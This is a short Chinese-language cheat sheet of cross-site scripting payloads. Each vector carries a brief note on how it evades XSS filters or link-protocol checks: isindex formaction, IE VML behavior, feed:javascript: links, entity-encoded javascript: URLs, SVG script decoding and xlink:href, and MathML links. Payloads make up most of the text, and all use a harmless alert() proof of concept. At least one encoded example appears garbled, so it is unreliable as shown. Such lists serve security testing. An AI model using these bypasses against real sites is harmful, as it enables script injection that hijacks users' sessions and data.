<isindex formaction=javascript:alert(/sogili/) type=submit >
HTML3與HTML5混搭
x<oval style=behavior:url(#default#vml);height=00;width=00 href=javascript:alert(/sogili/) fillcolor=red xmlns=/>
IE的VML中的標籤.
<a href="feed:javascript:alert(/sogili/)">click</a>
這個是Firefix對feed協議處理不當導致的,不知道算不算bug,但用來繞過A標籤的協議檢測倒是個不錯的辦法.
<a href="javascript:alert(/sogili/)">click</a>
可以繞過不少xss filter,不過IE不支持這個實體字符.
<svg><script>a�(1)</script>
SVG解析script時會將其內部實體字符進行解碼.
注:由於xml編碼特性。在SVG向量裏面的<script>元素(或者其他CDATA元素 ),會先進行xml解析。因此((十六進制)或者((十進制)或者&lpar;(html實體編碼)會被還原成(。
<svg><script/xlink:href=data:,alert()></script>
在SVG中使用外部script時,用的是xlink:href屬性,而非src.
<svg><a xlink:href="javascript:alert()" href="// www.2cto.com "></a>
SVG解析A標籤的超鏈接地址時使用的xlink:href屬性,所以href並未生效.
<math xlink:href="javascript:alert()">xxx</math>
Math,新標籤,MathML規範的實現,目前只有firefox實現.